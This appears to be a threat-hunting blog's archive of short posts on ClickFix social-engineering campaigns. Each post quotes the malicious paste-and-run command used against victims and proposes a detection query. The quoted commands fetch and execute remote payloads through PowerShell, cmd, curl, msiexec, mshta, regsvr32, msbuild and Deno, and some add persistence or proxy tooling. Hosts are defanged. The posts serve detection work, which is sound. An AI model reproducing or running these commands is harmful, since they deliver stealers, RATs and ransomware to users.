Posts

Showing posts with the label clickfix

412. Threat Actors Abuse Deno to Run Remote JavaScript Payloads

Image
Hello everyone! Today, we’ll talk about JavaScript (T1059.007) and how attackers abuse a legitimate runtime. As part of another ClickFix campaign, the attackers used some pretty interesting techniques. First, they used winget.exe to download and install the Deno runtime. Second, they used Deno to execute a malicious payload from a remote server controlled by the attackers: deno.exe run -A hxxp://webstizkgao[.]com/v020def066f14754be9.js So, it looks like Deno could be a great hunting target: event_type: "processcreatewin" AND proc_file_originalfilename: "deno.exe" AND cmdline: "run" See you soon!

394. Hunting for PySoxy: Another Tool Delivered via ClickFix

Image
Hello everyone! Today we'll look at another tool delivered by threat actors via ClickFix . And this time it's a 10-year-old open-source Python SOCKS5 proxy - PySoxy . So, according to ReliaQuest report , the adversary leveraged interactive PowerShell access to download Python tooling to C:\ProgramData .  The following command was executed to run the tool: python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97 The tool was identified as PySoxy. As you can see, there're a few interesting command line parameters we can use to build a hunting query, for example: event_type: "processcreatewin" AND cmdline: ("remote_port" AND "remote_ip")  See you soon!

390. A New ClickFix Variant Abuses Cmdkey

Image
Hello everyone! Today we’re going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004). This time, according to the report , the attackers prompted the victim to run the following command: C:\WINDOWS\system32\cmd.exe /c cmdkey /add:151.245.195[.]142 /user:guest && start regsvr32 /s \\151.245.195[.]142\hi\demo.dll & REM I am not a robot – Cloudflare ID: d7f5a3335794c434 As you can see, before registering a malicious library from a remote server using regsvr32.exe , the attackers use cmdkey.exe to store credentials for accessing that server. And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to the Windows Credential Manager: event_type: "processcreatewin" AND proc_file_path: "cmdkey.exe" AND cmdline: "add" See you soon!

375. The New ClickFix Variant: Do We Really Need To Detect It?

Image
Hello everyone! Variants of the Malicious Copy and Paste technique (T1204.004) continue to remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities. This particular variant was shared by researchers from Microsoft Threat Intelligence . The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response: cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1 Despite the originality of the approach, the Name: field contains a fairly ordinary command: powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex" As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this: event_type: "processcreatewin" AND...

367. Adversaries Use Fake BSOD to Make a Victim to Run a Malicious Command

Image
Hello everyone! Why are phishing emails needed if victims can run a malicious command themselves? Yes, today we’re once again looking at an interesting variant of User Execution: Malicious Copy and Paste (T1204.004) . In fact, phishing emails were still involved: this time the attackers disguised themselves as Booking.com. The email contained a link leading to a phishing website. When the victim clicked the “Refresh page” button, the browser switched to full-screen mode and displayed a familiar instruction to copy and paste a malicious command - this time cleverly disguised as a Blue Screen of Death . As for the command itself, it was also quite interesting and included the use of Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001) : powershell -c “start hxxps[://admin.booking[.]com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj” Detection: Pay attention to file...

288. ClickFix, FileFix... So What?

Image
 Hello everyone! ClickFix, FileFix... We see it every day. But what does it mean from detection perspective? Let's look at an example . FileFix. The victim should paste the following command: PowerShell -noP -W H -ep Bypass -C "$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;$e=[System.Text.Encoding]::UTF8;$c=[System.Convert];$egb=$e.GetBytes;$egs=$e.GetString;$cf=$c::FromBase64String;$ct=$c::ToBase64String;$u='hxxps[://]bitbucket[.]org/pibejiloiza/pi73/raw/4e2ff4d859e04af8d01fd961ab56163736a731f9/pexels-willianmatiola-33593998-3[.]jpg';$egs.Invoke($cf.Invoke('JHBfZmlzdD0tam9pbigkZW52OlRFTVAsJ1x6ZDc0NmYxY2UxYzAuanBnJyk7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtTWV0aG9kIEdldCAtT3V0RmlsZSAkcF9maXN0IC1FcnJvckFjdGlvbiBJZ25vcmU7CiRpbWFnZV9ieXRlcz0kaWZyLkludm9rZSgkcF9maXN0KTskcF9ieXRlcz0kaW1hZ2VfYnl0ZXNbMTEwMTI1My4uKCRpbWFnZV9ieXRlcy5MZW5ndGgtMSldOyRlLkdldFN0cmluZygkcF9ieXRlcyl8aWV4Ow=='))|iex;$z=' C:\\Users\\Default\\Documents\\Meta\\Facebook\\Shar...

247. Another Hunting Opportunity from ClickFix

Image
Hello everyone! We already looked at many ClickFix variations, but adversaries keep experimenting with this technique, so we can get more and more detection and hunting opportunities. This time we'll look at another example used by threat actors to deliver Lumma stealer. The victim is expected to run the following command: cmd.exe /c start "" /min cmd /k "curl -s hXXp://85.209.129[.]105:2020/19 | cmd && exit; capcha code 74585 Here we can see that the adversary used command line arguments to start download process with the new window minimized. You won't see it very often to be used in legitimate way, so we can use it to create a hunting query: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("start" AND "min") See you tomorrow!

235. Adversaries Abuse Msiexec as a Part of ClickFix

Image
Hello everyone! There're lots of legitimate binaries used by threat actors as a part of ClickFix. PowerShell, Windows Command Shell, mshta... But today we'll look at the following technique:  System Binary Proxy Execution: Msiexec (T1218.007) . This time the adversary abused msiexec to install NetSupport RAT to the compromised system: msiexec /i hXXps://cf-2-up[.]com/res/skirthub /qn 87af19ba=a296378a+606fc0b0*05a130cd(980b6676^174d7ea5*b01eaa45 For example, we can look for msiexec running files without .msi extension from a remote server: event_type: "processcreatewin" AND proc_file_path: "msiexec.exe" AND cmdline: *http* AND NOT cmdline: *msi* See you tomorrow!

209. Threat Actors Leverage ClickFix to Deploy Epsilon Red Ransomware

Image
Hello everyone! Zero days without ClickFix. This time an adversary leveraged this technique to deploy  Epsilon Red ransomware. This time the "verification" process was a bit unusual. A victim needed to save copied data as an HTA file, execute it, get the code and paste it to another window. First, the file executes a command to download and execute an Epsilon Red payload: cmd /c cd /D %userprofile% && curl -s -o a.exe hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe Next, it provides the "code": cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause And here we have an interesting detection opportunity: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("echo" AND "verificatification code") See you tomorrow!

208. Hunting for ClickFix on macOS

Image
Hello everyone! You think that ClickFix technique is used only to attack Windows-based systems? It's not true. The adversaries also use it to attack macOS! Hunt.io shared a report on a recent phishing campaing targeting macOS users. The adversary leveraged fake CAPTCHA to trick victims to run Terminal commands. According to the report, the pasted command typically starts with: echo 'BASE64_ENCODED_PAYLOAD' | base64 -d | bash So, we can use it to build a query for our hunting mission: event_type: "processcreatemac" AND cmdline: ("echo" AND "base64" AND "bash") The command runs a hidden script that can steal crypto wallets, cookies, and sensitive files. See you tomorrow!

194. Can Darknet Forums Help Us with Threat Hunting?

Image
Hello everyone! I'm sure many of you consumer or even produce intelligence related to the Darknet. Initial access brokers, sold databases, stealer logs for sale... But what about threat hunting? Can we get valuable intelligence and transform it to a hypothesis for threat hunting? Yes, we can! Let's look at an example. Recently a threat actor with moniker " tainted_l0ve " advertised a new ClickFix delivery method: My attention caught the follwing part: "on delivery, command is automatically deleted from user "Run" history". If you ever did digital forensics, you must know that RunMRU (Most Recently Used) is a Windows registry key that stores a list of the last 26 commands entered in the Run dialog (Win + R). And it means the tool most likely clear this key, so we can use it for hunting: event_type: "registryobjdelete" AND reg_key_path: "runmru" See you tomorrow!

177. Hunting for SideCopy's DRAT V2

Image
Hello everyone! Let's look at another example of leveraging ClickFix technique. This time it's SideCopy - a sub-cluster of Transparent Tribe. Recently Recorded Future reported on a new version of DRAT - let's look at some detection and hunting opportunities. First of all, the adversary abuses mshta.exe : C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers: event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: ("http" OR "https") Next - it abuses reg.exe to establishes persistence for DRAT: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf Here we can hunt for adding files located under %PUBLIC% to the Run key, for example: event_typ...

172. Another Curious ClickFix PowerShell Command

Image
Hello everyone! I think already everybody knows about ClickFix technique, but we still see new and new variations, especially if we are talking about a command a victim should paste. Proofpoint has published a report on Amatera Stealer , and the adversary leveraged ClickFix technique to deliver it. The victim should paste the following command into the Windows Run dialog: powershell -w h -c "$p=$env: TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env: SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p" The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and executes it using msbuild.exe . So, as always, we can use suspicious command line arguments for detection, for example: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: (*msbuild* AND *csproj*) See you tomorrow!

170. Hunting for Mocha Manakin

Image
Hello everyone! Red Canary has colored another bird . This time the cluster is called  Mocha Manakin . The adversary leverages ClickFix technique to deliver NodeJS-based backdoor named NodeInitRAT . Researchers note that ths activity has overlaps with  Interlock ransomware, so it's important to detect this as early as possible. They already shared a few detection opportunities you can use, but I also suggest hunting for suspicious events related to PowerShell spawning node.exe : event_type: "processcreatewin" AND proc_p_file_path: "powershell.exe" AND proc_file_path: "node.exe" See you tomorrow!

112. State-Sponsored Threat Actors Adopted ClickFix Technique

Image
Hello everyone! We've talked about ClickFix a few times already. But it's quite interesting how various adopt this technique. According to Proofpoint report , multiple state-sponsored adversaries started to use this technique. For example, TA427 (we track this activity cluster under the name Monolithic Werewolf). The threat actor masquaraded malicious PowerShell command to look like a registration code: powershell -windowstyle hidden -Command iwr       "hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile       "$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex       $c;                                                                                    3Z5TY-76FR3-9G87H-7ZC56 As you can see, the command includes...

097. Adversaries Abuse PowerShell to Generate Malicious Links

Image
Hello everyone! I'm sure everybody already got tired of ClickFix technique, but let me show you another interesting case I spotted recently. It's again about PowerShell abuse. This time adversaries used it to generate the download link: powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 168.119.173[.]205:8080/$u|iex" As you can see, it gets the number of seconds since Unix epoch (Jan 1, 1970), uses it to build a URL, downloads and executes the payload in memory. Of course, we can easily detect such activity, for example, using this logic: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("datetime" AND "UtcNow" AND "1970" AND "iex") Have you seen other interesting scripts in ClickFix campaigns? See you tomorrow!

032. DarkGate Delivery via ClickFix Attack: Detection and Hunting Opportunities

Image
Hello everyone! Today we're going to talk about DarkGate Loader and ClickFix attacks. Both are quite common, I'm not sure about ClickFix, but DarkGate is used by adversaries even is CIS. Let's look at a recent ClickFix campaign analysed by Malwarebytes Labs . The chain starts from a malicious Google ad. If the victim clicks it, he or she sees a fake “Verify you are human” page. After checking the box, the victim sees the instructions on how to launch the Run dialog and paste a malcious PowerShell script: cmd /c "powershell -w h -e [base64_encoded_commands] && I am human - Ray ID:4092" As you can see, the threat actors added an interesting string to make the "verification" look more legitimate. You definitely can use it for detection! If we decode Base64, we can see very common cmdlets used by adversaries for downloading and running malicious files: " Invoke-WebRequest " and " Start-Process ". So, this is another detection oppo...